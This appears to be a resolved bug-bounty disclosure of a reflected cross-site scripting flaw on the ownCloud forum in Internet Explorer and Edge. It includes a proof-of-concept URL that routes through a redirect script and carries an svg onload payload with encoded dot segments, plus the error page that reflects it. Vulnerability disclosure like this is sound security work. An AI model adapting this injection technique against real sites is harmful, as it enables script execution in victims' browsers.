[forum.owncloud.org] IE, Edge XSS via Request-URI
O
ownCloud
Submitted None
Actions:
Reported by
bobrov
Vulnerability Details
Technical details and impact analysis
**PoC** (Internet Explorer, Edge):
```
https://blackfan.ru/x?r=https://forum.owncloud.org/<svg/onload=alert(document.domain)>/%252e%252e
```
blackfan.ru/x?r - simple redirection script, that necessary for exploitation
**HTTP Response**:
```html
<div class="panel" id="message">
<div class="inner">
<h2 class="message-title">Information</h2>
<p>No route found for "GET /<svg/onload=alert(document.domain)>/%2e%2e"</p>
</div>
</div>
```
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Generic